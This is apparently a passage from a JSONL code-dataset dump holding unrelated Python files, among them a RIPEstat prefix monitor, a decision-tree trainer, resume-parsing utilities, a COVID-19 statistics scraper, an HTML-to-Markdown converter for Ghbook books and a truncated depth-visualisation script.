{}\n\t\t\tfinalDict[count]['start'] = val\n\t\telse:\n\t\t\tif x > 2:\n\t\t\t\tfinalDict[count]['stop'] = val\n\t\t\t\tcount += 1\n\treturn 
finalDict.values()","sub_path":"fuck/app/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"167916970","text":"\"\"\"Manages some aspects of masked data.\"\"\"\n\n# This file is part of the 'tomate' project\n# (http://github.com/Descanonge/tomate) and subject\n# to the MIT License as defined in the file 'LICENSE',\n# at the root of this project. © 2020 Clément HAËCK\n\n\nimport numpy as np\n\ntry:\n import scipy.ndimage as ndimage\nexcept ImportError:\n _has_scipy = False\nelse:\n _has_scipy = True\n\nfrom tomate.db_types.data_compute import do_stack\n\n\ndef get_circle_kernel(n):\n \"\"\"Return circular kernel for convolution of size nxn.\n\n Parameters\n ----------\n n: int\n Diameter of kernel.\n\n Returns\n -------\n Array\n Shape (n, n)\n \"\"\"\n kernel = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n kernel[i, j] = (i-(n-1)/2)**2 + (j-(n-1)/2)**2 <= (n/2)**2\n\n return kernel\n\n\ndef enlarge_mask(mask, n_neighbors, axes=None):\n \"\"\"Enlarge a stack of boolean mask by `n_neighbors`.\n\n Parameters\n ----------\n mask: Array\n n_neighbors: int\n axes: List[int]\n Position of the two horizontal dimensions,\n other axes will be looped over.\n \"\"\"\n if not _has_scipy:\n raise ImportError(\"scipy package necessary to use enlarge_mask.\")\n\n N = 2*n_neighbors + 1\n kernel = get_circle_kernel(N)\n\n mask = do_stack(ndimage.convolve, 2, 1.*mask, kernel, axes) > 0\n\n return mask\n\n\ndef fill_edge(data, axes=None):\n \"\"\"Fill masked by value of closest pixel.\n\n Parameters\n ----------\n data: Array\n axes: List[int]\n Axes to work on.\n If None, the last two axes are used.\n \"\"\"\n if not _has_scipy:\n raise ImportError(\"scipy package necessary to use fill_edge.\")\n\n mask = data.mask\n small_mask = ~enlarge_mask(~mask, 1, axes=axes)\n to_fill_mask = small_mask * mask\n\n kernel = np.array([[0, 1, 0],\n [1, 0, 1],\n [0, 1, 0]])\n to_fill = do_stack(ndimage.convolve, 2, data.filled(0), kernel, axes)\n data.data[to_fill_mask] = to_fill\n return np.ma.array(data, mask=small_mask)\n","sub_path":"src/tomate/db_types/masked/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"306021480","text":"# Write two Python functions to find the minimum number in a list.\na = [4, 2, 1, 3]\n\n# The first function should compare each number to every other number on\n# the list. O(n2).\n\n\ndef get_min_n_1(list):\n min_n = list[0]\n for n in list:\n for m in list:\n if n < m and n < min_n:\n min_n = n\n print(min_n)\n\n\nget_min_n_1(a)\n\n# The second function should be linear O(n).\n\n\ndef get_min_n_2(list):\n min_n = list[0]\n for n in list:\n if n < min_n:\n min_n = n\n print(min_n)\n\n\nget_min_n_2(a)\n","sub_path":"Chapter2/self_check1.py","file_name":"self_check1.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"113952439","text":"#! 
/usr/bin/env python\n\nfrom ApiClient import ApiClient\nfrom CommonConfig import CommonConfig\nfrom apscheduler.scheduler import Scheduler\nimport logging\nimport logging.handlers\nfrom colorlog import ColoredFormatter\nimport urllib\nimport urllib2\nimport json\nimport time\n\nsched = Scheduler()\nlogger = logging.getLogger(__name__)\n\nVERSION = \"0.1\"\nRIPESTATAPP = \"esgobanycast\"\n\nac = None\nenv = None\ncc = None\n\n\n@sched.interval_schedule(minutes=45)\ndef prefixhealth_ripestat():\n logger.info(\"Checking prefixes against RIPEstat\")\n\n resp = ac.Call(\"internal/anycastnodes.list\")\n if not resp.success:\n logger.error(\"Failed to get list of nodes\")\n return\n nodes = resp.data[\"anycastnodes\"]\n logger.debug(\"Retrived %s nodes\" % (len(nodes)))\n\n for node in nodes:\n id = node[\"id\"]\n if \"specific6\" not in node:\n logger.warn(\"%s has no specific v6 routes\", id)\n specific6 = node[\"specific6\"]\n logger.info(\"Checking %s specific %s v6 routes\" % (id, len(specific6)))\n for route in specific6:\n routesseen = ripestat_route_bgpstate(route)\n if routesseen is not None:\n logger.debug(\"%s routes %s\" % (routesseen, route))\n resp = ac.Call(\"internal/monitoring.prefixhealth.update?version=6&source=ripestat&prefix=%s&routes=%s\" % (route, routesseen))\n\n return\n\n\ndef ripestat_route_bgpstate(route):\n url = \"https://stat.ripe.net/data/bgp-state/data.json?resource=%s\" % (route)\n try:\n request = urllib2.Request(url)\n result = urllib2.urlopen(request)\n ripeobj = json.loads(result.read())\n except:\n logger.error(\"Error calling RIPEstat for prefix %s\" % (route))\n return None\n if \"data\" not in ripeobj:\n logger.error(\"Error parsing RIPEstat bgpstate 'data' not found, prefix %s\" % (route))\n return None\n data = ripeobj[\"data\"]\n if \"nr_routes\" not in data:\n logger.error(\"Error parsing RIPEstat bgpstate 'nr_routes' not found, prefix %s\" % (route))\n return None\n routes = int(data[\"nr_routes\"])\n return routes\n\ndef setupLogging():\n # setup logging\n logger.setLevel(logging.DEBUG)\n # log file\n setupLoggingFile()\n # console\n setupLoggingConsole()\n return\n\n\ndef setupLoggingConsole():\n formatter = ColoredFormatter(\n \"%(asctime)s %(log_color)s %(levelname)-8s%(reset)s %(white)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n }\n )\n stream = logging.StreamHandler()\n stream.setLevel(logging.DEBUG)\n stream.setFormatter(formatter)\n logger.addHandler(stream)\n return\n\n\ndef setupLoggingFile():\n logfilename = cc.getstr(\"logging\", \"logfilename\")\n logfilebytes = cc.getstr(\"logging\", \"logfilebytes\")\n logfilecount = cc.getstr(\"logging\", \"logfilecount\")\n rfhhandler = logging.handlers.RotatingFileHandler(logfilename, maxBytes=logfilebytes, backupCount=logfilecount)\n rfhhandler.setLevel(logging.DEBUG)\n rfhformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n rfhhandler.setFormatter(rfhformatter)\n logger.addHandler(rfhhandler)\n return\n\n\nif __name__ == '__main__':\n\n cc = CommonConfig()\n ac = ApiClient(commonconfig=cc)\n\n setupLogging()\n\n logger.info(\"Health monitor v%s\" % (VERSION))\n\n prefixhealth_ripestat()\n\n # scheduler\n# logger.info(\"Starting scheduler\")\n# sched.start()\n\n# logger.info(\"Sleeping\")\n# while True:\n# time.sleep(30)\n\n logger.info(\"exiting\")\n\n 
exit(0)\n","sub_path":"esgobhealth.py","file_name":"esgobhealth.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608907486","text":"class style:\n BOLD = '\\033[1m'\n END = '\\033[0m'\n \ndef print_rec(dic):\n keys = dic.keys()\n for key in keys:\n print(style.BOLD + key + ': '+ style.END)\n print(dic[key])\n print('\\n')\n \ndef remove_spl_characters(text):\n text_alpha = ''\n for i in text:\n if not i.isalpha():\n if i == '+':\n text_alpha+=i\n else:\n text_alpha+=' '\n\n else:\n text_alpha+=i\n return text_alpha\n\ndef list_to_str(listt):\n strr = \"\" \n for x in listt:\n if len(listt)>1:\n strr += str(x)+\" \"\n else:\n strr = str(x)\n return strr\n\ndef lists_to_str(lists):\n return list_to_str(lists[0]), list_to_str(lists[1])\n\ndef preprocess_collegename_files(file):\n df = pd.read_csv(file, encoding = \"ISO-8859-1\")\n df.drop(df.iloc[:,1:], inplace = True, axis = 1)\n if(file.find('college')!=-1):\n df.rename(columns={'Name of the College':'collegename'},inplace=True)\n df['collegename'] = df.collegename.str.split(\",\",expand=True) \n else:\n df.rename(columns={'Name of the University':'univname'},inplace=True)\n df['univname'] = df.univname.str.split(\",\",expand=True)\n \n df_list = df.values\n df_l = []\n for element in df_list:\n df_l.append(\"\".join(element).replace(\" \", \"\").lower())\n return df_l\n\n\ndef search_college_from_text(text, l):\n pos = []\n names = []\n for val in l:\n x = text.find(val)\n if(x!=-1):\n pos.append(x)\n names.append(val)\n return pos, names\n\n\ndef extract_college_or_uni(text, college_l, uni_l):\n pos, names = search_college_from_text(text, college_l)\n if(len(pos) == 0):\n pos, names = search_college_from_text(text, uni_l)\n pos = list(dict.fromkeys(pos))\n names = list(dict.fromkeys(names))\n colleges = remove_repeated_collegenames(names)\n return colleges\n\n\ndef remove_repeated_collegenames(names):\n multiple = []\n for i in range(len(names)):\n name = names[i]\n for j in range(len(names)):\n if names[j].find(name)!= -1:\n name = names[j]\n multiple.append(name)\n multiple = list(dict.fromkeys(multiple))\n return multiple\n\ndef get_education_word_list(dir_path):\n file_name = \"education_segment.csv\"\n reader = read_csv(dir_path+file_name)\n education_word_list = []\n for row in reader:\n education_word_list.append(row[0])\n return education_word_list \n \ndef get_keywords(file_name):\n dir_path = ''\n reader = read_csv(dir_path + file_name)\n keywords = []\n for row in reader:\n keywords.append(row[0])\n return keywords\n\ndef read_csv(input_file):\n file = open(input_file, 'r')\n reader = csv.reader(file)\n return reader\n\ndef get_major_word_list(dir_path):\n file_name = \"csvfiles/educational_major.csv\"\n reader = read_csv(dir_path + file_name)\n major_list = []\n for row in reader:\n major_list.append(row[0])\n return major_list\n\ndef search_major(text, degree, edu_obj): \n maxim = -1\n # Search for major\n for major in major_word_list:\n if major.lower() in (text.lower()) and len(major) > max:\n major = str(major).title()\n degree = degree.title()\n maxim = len(str(major))\n return degree_flag\n\ndef get_qualification_word_list(dir_path):\n file_name = \"csvfiles/qualification_degree_list.csv\"\n reader = read_csv(dir_path+file_name)\n qualification_word_dict = {}\n qualification_word_dict_no_spaces = {}\n abbr_list = []\n degree_list = []\n for row in reader:\n abbr_list.append(row[0])\n abbr_list.append(row[0].replace(\" \", 
''))\n degree_list.append(row[1])\n degree_list.append(row[0].replace(\" \", ''))\n qualification_word_dict[row[0]] = row[1]\n qualification_word_dict_no_spaces[row[0].replace(\" \", '')] = row[1].replace(\" \", '')\n return qualification_word_dict, qualification_word_dict_no_spaces, abbr_list, degree_list\n\nimport os\n\ndef csv_to_list(file):\n import csv\n data = []\n with open(file, newline='') as f:\n reader = csv.reader(f)\n for row in reader:\n data.append(''.join(row))\n\n return data\n\ndef get_category_list():\n path = 'list/'\n filenames = os.listdir(path)\n segment = {}\n for file in filenames:\n if '.csv' in file:\n segment[str(os.path.splitext(file)[0])] = csv_to_list(os.path.join(path, file))\n segments = {}\n\n for key in segment.keys():\n l = []\n for i in range(len(segment[key])):\n l.append((segment[key][i]).upper())\n l.append((segment[key][i]).title())\n l.append((segment[key][i]).upper().replace(' ', ''))\n l.append((segment[key][i]).title().replace(' ', ''))\n segments[key] = l\n return segments\n\n\ndef print_segments(segment_category, segment_text, segment_count):\n for i in range(segment_count):\n print(style.BOLD + 'category: ' + segment_category[i] + style.END)\n print('segment: ' + segment_text[i])\n print('\\n') ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631564737","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom noti import send\n\nBASE_URL = \"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=\"\n\nres = requests.get(BASE_URL)\nsoup = BeautifulSoup(res.content, 'html.parser')\n\nlast_updated = soup.select('div.timetable > p > span')[0].text\nlast_updated_month = last_updated.split('.')[0][1:]\nlast_updated_date = last_updated.split('.')[1]\n\nnational_data = soup.select(\n 'div.regional_patient_status_A > div.rpsa_detail > div > div.open > div.mapview > ul.cityinfo > li')\n\nnational_total_cases = national_data[0].select('div > span')\nnational_daily_change = national_data[1].select('div > span')\nnational_active_cases = national_data[2].select('div > span')\nnational_total_recovered = national_data[3].select('div > span')\nnational_total_deaths = national_data[4].select('div > span')\n\nprovince_data = soup.select('div.rpsam_graph > div > button > span')\nseoul_total_cases = province_data[1]\nseoul_daily_change = province_data[2]\nincheon_total_cases = province_data[10]\nincheon_daily_change = province_data[11]\ngyeonggi_total_cases = province_data[25]\ngyeonggi_daily_change = province_data[26]\n\nresult = f'🇰🇷COVID-19 Update🇰🇷\\n' + \\\n f'📆{last_updated_date}/{last_updated_month}/2020\\n\\n' + \\\n '😷National stats\\n' + \\\n f'Daily change: {national_daily_change[1].text[1:-1]}\\n' + \\\n f'Total cases: {national_total_cases[1].text}\\n' + \\\n f'Total deaths: {national_total_deaths[1].text}\\n\\n' + \\\n '😷Seoul stats\\n' + \\\n f'Daily change: {seoul_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: {seoul_total_cases.text}\\n\\n' + \\\n '😷Incheon stats\\n' + \\\n f'Daily change: {incheon_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: {incheon_total_cases.text}\\n\\n' + \\\n '😷Gyeonggi stats\\n' + \\\n f'Daily change: {gyeonggi_daily_change.text[1:-1]}\\n' + \\\n f'Total cases: 
{gyeonggi_total_cases.text}'\n\nprint(result)\nsend(result)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"366003151","text":"from dotenv import load_dotenv\nimport os\n\nfrom bot import bot\n\nif __name__ == '__main__':\n load_dotenv()\n token = os.getenv(\"TOKEN\")\n if token is None:\n print(\"Environment variable \\\"TOKEN\\\" not set\")\n exit(0)\n bot.run(token)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218884928","text":"# Andrew Heyman\n# 10/04/2016\n\nimport pandas as pd\nimport pickle\n\n# Node class to store decisions\nclass Node:\n def __init__(self, lbl = None, threshold = None, col = None, tb = None, fb = None):\n self.lbl = lbl #class label\n self.threshold = threshold #the less than or equal value to be true\n self.col = col# column\n self.tb = tb\n self.fb = fb\n\nclass DecisionTree:\n \n '''\n Method to calculate the Gini index of a column, in a \n specific dataframe\n '''\n @staticmethod\n def gini_index(thresh, column, df):\n\n leq_elements = 0\n greater_elements = 0\n\n low_class_0 = 0\n high_class_0 = 0\n\n for index, row in df.iterrows():\n if row[column] <= thresh:\n leq_elements += 1\n\n if row[(df.shape[1]-1)] == 0:\n low_class_0 += 1\n else:\n greater_elements += 1\n\n if row[(df.shape[1]-1)] == 0:\n high_class_0 += 1\n\n # Handle divide by 0 errors\n if leq_elements == 0:\n low_gini = 0\n else:\n low_gini = 1 - ((low_class_0 / leq_elements) ** 2 + ((leq_elements - low_class_0) / leq_elements) ** 2)\n\n if greater_elements == 0:\n high_gini = 0\n else:\n high_gini = 1 - ((high_class_0 / greater_elements) ** 2 + ((greater_elements - high_class_0) / greater_elements) ** 2)\n\n return ( low_gini * leq_elements/df.shape[0] + high_gini * greater_elements/df.shape[0])\n\n '''\n Method to generate tree\n '''\n def generate_tree(self, df):\n if len(set(df['Class'].tolist())) == 1:\n return Node(lbl = df['Class'].tolist()[0] )\n else:\n root = Node()\n [root.threshold, root.col] = DecisionTree.best_split(df)\n\n # split up the dataset based on the threshold\n # for each of the splits\n\n lower = df.loc[df[root.col] <= root.threshold]\n upper = df.loc[df[root.col] > root.threshold]\n\n root.tb = DecisionTree.generate_tree(self, lower )\n root.fb = DecisionTree.generate_tree(self, upper )\n return root\n\n\n '''\n Finds the best split in a dataframe\n ''' \n @staticmethod\n def best_split(dataframe):\n\n # Lowest Gini\n min_gini = float(\"inf\")\n ideal_col = -1\n ideal_bin = -1\n\n # For each column\n for column in dataframe:\n\n if column == \"Class\":\n break\n else:\n # Make quantile bins in groups of quartiles bins\n bins = pd.qcut(dataframe[column], 4, retbins=True)\n\n # Find the min gini\n for bin in bins[1]:\n bin_gini = DecisionTree.gini_index(bin, column, dataframe)\n if (bin_gini < min_gini):\n min_gini = bin_gini\n ideal_col = column\n ideal_bin = bin\n\n return [ideal_bin, ideal_col]\n\n '''\n Simple method to print tree, adding spaces as depth continues\n '''\n @staticmethod\n def tree_print(tree, space=\"\"):\n if tree.lbl is not None:\n print(\"value: \" + str(tree.lbl))\n else:\n print(\"if \" + tree.col+ \" <= \" + str(tree.threshold) +\" ?\")\n\n print(space + \"True:\", end=' ')\n DecisionTree.tree_print(tree.tb, space + \" \")\n print(space + \"else:\", end=' ')\n 
DecisionTree.tree_print(tree.fb, space + \"  \")\n\n    @staticmethod\n    def generate_program(tree):\n        # serialize the trained tree so the classifier script can load it back\n        pickle.dump(tree, open(\"tree.p\", \"wb\"))\n\n'''\nGenerates the tree as a pickle file\nAllows the classifier to work\n'''\nclass TryIt:\n\n    file_loc = r\"RawData.csv\"\n    df = pd.read_csv(file_loc)\n\n    tree = DecisionTree()\n\n    root = tree.generate_tree(df)\n    tree.generate_program(root)\n    tree.tree_print(root)\n","sub_path":"HW_04B_Heyman_Andrew_Trainer.py","file_name":"HW_04B_Heyman_Andrew_Trainer.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"425109871","text":"from make import Clear, getUSTVGO, replaceUStVicons, MakeCS, MakeEng, MakeMain, Git, pushbulletMode, remPYC, RemoveMode2\nfrom Auth.auth import name, Email, gitToken, gitRepo\nimport time\nimport os\n\ntoken = gitToken\nrepo = gitRepo\nemail = Email\n\norigin = \"sudo git remote set-url origin https://github:\" + str(token) + str(repo)\nconfig_mail = \"sudo git config --global user.email \" + email\nconfig_name = \"sudo git config --global user.name \" + name\n\n\ndef echo(msg):\n    echocmd = \"sudo echo \" + '\"' + msg + '\"'\n    os.system(echocmd)\n\nauto = True\n# read the polling interval and convert it to an int once, up front\ntimeoutTime = int(open('Assets/Service/timeou.txt').read())\n\nmsg = \"Timeout time is: \" + str(timeoutTime)\n\necho(msg)\n\ndef Main():\n    RemoveMode2()\n    Clear()\n    getUSTVGO()\n    replaceUStVicons()\n    MakeCS()\n    MakeEng()\n    MakeMain()\n    Git()\n    #pushbulletMode(5)\n    remPYC()\n\n\nwhile auto:\n    Main()\n    echo(\"Waiting \" + str(timeoutTime) + \" seconds\")\n    time.sleep(timeoutTime)\n","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"406028388","text":"\"\"\"Convert Ghbook library html to OpenITI mARkdown.\n\nThis script subclasses the generic MarkdownConverter class\nfrom the html2md module (based on python-markdownify,\nhttps://github.com/matthewwithanm/python-markdownify),\nwhich uses BeautifulSoup to create a flexible converter.\n\nThe subclass in this module, GhbookHtmlConverter,\nadds methods specifically for the conversion of books from\nthe Ghbook library to OpenITI mARkdown:\n\n* Span, div and p conversion: the span, div and p classes that need to be\n  converted are defined in self.class_dict.\n\n\nInheritance schema of the GhbookHtmlConverter:\n\n======================== ==========================\nMarkdownConverter        GhbookHtmlConverter\n======================== ==========================\nOptions                  (inherited)\nDefaultOptions           (inherited)\n__init__                 (inherited)\n__getattr__              (inherited)\nconvert                  (inherited)\nprocess_tag              (inherited)\nprocess_text             (inherited)\nfill_out_columns         (inherited)\npost_process_md          (inherited)\nshould_convert_tag       (inherited)\nindent                   (inherited)\nunderline                (inherited)\ncreate_underline_line    (inherited)\nconvert_a                (inherited)\nconvert_b                (inherited)\nconvert_blockquote       (inherited)\nconvert_br               (inherited)\nconvert_em               (inherited)\nconvert_hn               (inherited)\nconvert_i                (inherited)\nconvert_img              (inherited)\nconvert_list             (inherited)\nconvert_li               (inherited)\nconvert_ol               (inherited)\nconvert_p                convert_p\nconvert_table            (inherited)\nconvert_tr               (inherited)\nconvert_ul               (inherited)\nconvert_strong           (inherited)\n                         convert_span\n                         convert_div\n======================== ==========================\n\n\"\"\"\nimport re\n\nif __name__ == '__main__':\n    from os import sys, path\n    root_folder = 
path.dirname(path.dirname(path.abspath(__file__)))\n root_folder = path.dirname(path.dirname(path.dirname(root_folder)))\n sys.path.append(root_folder)\n\nfrom openiti.new_books.convert.helper import html2md\nfrom openiti.new_books.convert.helper.html2md import * # import all constants!\n\n\nclass GhbookHtmlConverter(html2md.MarkdownConverter):\n \"\"\"Convert Ghbook library html to OpenITI mARkdown.\n\n Examples:\n >>> import html2md_Ghbook\n >>> h = '<img class=\"libimages\" src=\"/images/books/86596/01/cover.jpg\">'\n >>> html2md_Ghbook.markdownify(h)\n '![](img/86596/01/cover.jpg)'\n\n >>> import html2md_Ghbook\n >>> h = 'abc <a href=\"www.example.com\">def</a> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n \"\"\"\n\n def __init__(self, **options):\n super().__init__(**options)\n self.class_dict = dict()\n self.class_dict[\"rightpome\"] = \"\\n# {} %~% \" # <span class>\n self.class_dict[\"leftpome\"] = \"{}\\n\" # <span class>\n self.class_dict[\"footnote\"] = \"{}\\n\" # <div class>\n## ##old:\n## self.class_dict[\"Titr3\"] = \"\\n\\n### ||| {}\\n\\n\" # <span class>\n## self.class_dict[\"KalamateKhas2\"] = \"\\n\\n### || {}\\n\\n\" # <p class>\n## self.class_dict[\"KalamateKhas\"] = \"\\n\\n### ||| {}\\n\\n\" # <p class>\n## self.class_dict[\"TextsStyles3\"] = \"\\n\\n### ||| {}\\n\\n\" # <p class>\n## self.class_dict[\"TextsStyles1\"] = \"@QUR@ {}\\n\" # <span class>\n## self.class_dict[\"Aye\"] = \"@QUR@ {}\\n\" # <span class>\n## self.class_dict[\"tdfehrest2\"] = \"\\t{}\" # <td class>\n## self.class_dict[\"list3\"] = \"\\t{}\" # <div class>\n## self.class_dict[\"sher\"] = \"# {}\\n\" # <p class>\n## self.class_dict[\"#6C3934\"] = \"\\n\\n# {}\\n\\n\" # <span class>\n\n self.options[\"image_link_regex\"] = \"/?images/books\"\n## self.options[\"image_folder\"] = \"img\"\n self.options[\"strip\"] = [\"a\", \"img\"]\n\n\n def convert_span(self, el, text):\n \"\"\"Converts html <span> tags, depending on their class attribute.\n\n Supported span classes should be stored in self.class_dict\n (key: span class (str); value: formatting string)\n E.g., {\"quran\": \"@QUR@ {}\\\\n\"}\n\n Example:\n >>> import html2md_Ghbook\n >>> h = 'abc <span>def</span> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = 'abc <span class=\"unknown_span_class\">def</span> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n #>>> h = 'abc <span class=\"Aya\">def ghi</span> jkl'\n #>>> html2md_Ghbook.markdownify(h)\n #'abc @QUR02 def ghi jkl'\n\n # the @QUR@ example outputs are a result of post-processing;\n # the function itself will produce:\n # 'abc @QUR@ def ghi\\\\njkl'\n \n >>> h = '<span class=\"rightpome\">abc def</span><span class=\"leftpome\">ghi jkl</span>'\n >>> html2md_Ghbook.markdownify(h)\n '\\\\n# abc def %~% ghi jkl'\n \"\"\"\n try: # will fail if el has no class attribute\n for c in el[\"class\"]:\n #print(c)\n if c in self.class_dict:\n return self.class_dict[c].format(text) if text else ''\n if c == \"ayah\":\n try:\n sura = el[\"surah\"]\n except:\n sura = \"0\"\n try:\n aya = el[\"ayah\"]\n except:\n aya = \"0\"\n #print(\"@QUR{}.{}@ {}\".format(sura, aya, text))\n return \"@QUR{}.{}@ {}\\n\".format(sura, aya, text)\n except Exception as e:\n pass\n return text\n\n\n def convert_div(self, el, text):\n \"\"\"Converts html <div> tags, depending on their class attribute.\n\n Supported div classes should be stored in self.class_dict\n (key: div class (str); value: formatting string)\n\n Example:\n >>> import html2md_Ghbook\n >>> h = 'abc <div>def</div> 
ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = 'abc <div class=\"unknown_div_class\">def</div> ghi'\n >>> html2md_Ghbook.markdownify(h)\n 'abc def ghi'\n\n >>> h = '<div class=\"ClssDivMeesage\">Page Is Empty</div>'\n >>> html2md_Ghbook.markdownify(h)\n ''\n \"\"\"\n try: # will fail if el has no class attribute\n for c in el[\"class\"]:\n if c in self.class_dict:\n return self.class_dict[c].format(text) if text else ''\n if c == \"ClssDivMeesage\":\n return \"\"\n except Exception as e:\n pass\n return text\n\n def convert_p(self, el, text):\n \"\"\"Converts <p> tags according to their class.\n\n Supported p classes should be stored in self.class_dict\n (key: span class (str); value: formatting string)\n E.g., {\"quran\": \"@QUR@ {}\\\\n\"}\n\n <p> tags without class attribute, or unsupported class,\n will be converted according to the markdown style\n as defined in the self.options[\"md_style\"] value\n (from super().DefaultOptions)\n\n Examples:\n >>> import html2md_Ghbook\n >>> h = \"<p>abc</p>\"\n >>> html2md_Ghbook.markdownify(h)\n '\\\\n\\\\n# abc\\\\n\\\\n'\n\n >>> h = \"<p>abc</p>\"\n >>> html2md_Ghbook.markdownify(h, md_style=ATX)\n '\\\\n\\\\nabc\\\\n\\\\n'\n\n >>> h = \"<p></p>\"\n >>> html2md_Ghbook.markdownify(h, md_style=ATX)\n ''\n \"\"\"\n if self.options['md_style'] == OPENITI:\n return '\\n\\n# %s\\n\\n' % text if text else ''\n else:\n return '\\n\\n%s\\n\\n' % text if text else ''\n\n def convert_sup(self, el, text):\n \"\"\"Converts <sup> tags (used for footnote markers).\"\"\"\n return \"({})\".format(text.strip())\n \n\n\ndef markdownify(html, **options):\n \"\"\"Shortcut to the convert method of the HindawiConverter class.\"\"\"\n return GhbookHtmlConverter(**options).convert(html)\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"openiti/new_books/convert/helper/html2md_Ghbook.py","file_name":"html2md_Ghbook.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395566152","text":"from __future__ import absolute_import, division, print_function\nimport time\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport torch\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom layers import *\nfrom utils import readlines\nfrom options import MonodepthOptions\nimport datasets\nimport networks\nimport cityscapesscripts.helpers.labels\nfrom utils import *\nfrom cityscapesscripts.evaluation.evalPixelLevelSemanticLabeling import *\nfrom cityscapesscripts.helpers.labels import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nsplits_dir = os.path.join(os.path.dirname(__file__), \"splits\")\nSTEREO_SCALE_FACTOR = 5.4\n\ndef tensor2rgb(tensor, ind):\n slice = (tensor[ind, :, :, :].permute(1,2,0).cpu().numpy() * 255).astype(np.uint8)\n # pil.fromarray(slice).show()\n return pil.fromarray(slice)\n\ndef tensor2semantic(tensor, ind, isGt = False):\n slice = tensor[ind, :, :, :]\n if not isGt:\n slice = F.softmax(slice, dim=0)\n slice = torch.argmax(slice, dim=0).cpu().numpy()\n else:\n slice = slice[0,:,:].cpu().numpy()\n # visualize_semantic(slice).show()\n return visualize_semantic(slice)\n\ndef tensor2disp(tensor, ind, vmax = None):\n # slice = tensor[]\n # plt.imsave(name_dest_im, disp_resized_np, cmap='magma', vmax=vmax)\n slice = tensor[ind, 0, :, 
:].cpu().numpy()\n if vmax is None:\n vmax = np.percentile(slice, 90)\n slice = slice / vmax\n # slice = slice / slice.max()\n cm = plt.get_cmap('magma')\n slice = (cm(slice) * 255).astype(np.uint8)\n # pil.fromarray(slice).show()\n return pil.fromarray(slice)\n\nclass Tensor23dPts:\n def __init__(self):\n self.height = 1024\n self.width = 2048\n xx, yy = np.meshgrid(np.arange(self.width), np.arange(self.height))\n self.xx = xx.flatten()\n self.yy = yy.flatten()\n objType = 19\n self.colorMap = np.zeros((objType + 1, self.xx.shape[0], 3), dtype=np.uint8)\n for i in range(objType):\n if i == objType:\n k = 255\n else:\n k = i\n self.colorMap[i, :, :] = np.repeat(np.expand_dims(np.array(trainId2label[k].color), 0), self.xx.shape[0], 0)\n self.colorMap = self.colorMap.astype(np.float)\n self.colorMap = self.colorMap / 255\n\n\n def visualize3d(self, tensor, ind, intrinsic, extrinsic, gtmask = None, gtdepth = None, semanticMap = None):\n assert tensor.shape[1] == 1, \"please input single channel depth map\"\n self.height = 1024\n self.width = 2048\n tensor = F.interpolate(tensor, [self.height, self.width], mode=\"bilinear\", align_corners=False)\n intrinsic = intrinsic.cpu().numpy()\n extrinsic = extrinsic.cpu().numpy()\n slice = tensor[ind, 0, :, :].cpu().numpy()\n\n depthFlat = slice.flatten()\n oneColumn = np.ones(self.height * self.width)\n pixelLoc = np.stack([self.xx * depthFlat, self.yy * depthFlat, depthFlat, oneColumn], axis=1)\n cam_coord = (np.linalg.inv(intrinsic) @ pixelLoc.T).T\n veh_coord = (np.linalg.inv(extrinsic) @ cam_coord.T).T\n colors = None\n\n if gtmask is not None and gtdepth is not None:\n gtdepth = gtdepth.cpu().numpy()\n mask = gtdepth > 0\n # mask = gtdepth > -1000000\n mask = mask.flatten()\n depthFlat = gtdepth.flatten()\n oneColumn = np.ones(gtdepth.shape[0] * gtdepth.shape[1])\n pixelLoc = np.stack([self.xx[mask] * depthFlat[mask], self.yy[mask] * depthFlat[mask], depthFlat[mask], oneColumn[mask]], axis=1)\n cam_coord = (np.linalg.inv(intrinsic) @ pixelLoc.T).T\n veh_coord_2 = (np.linalg.inv(extrinsic) @ cam_coord.T).T\n\n veh_coord = veh_coord[mask, 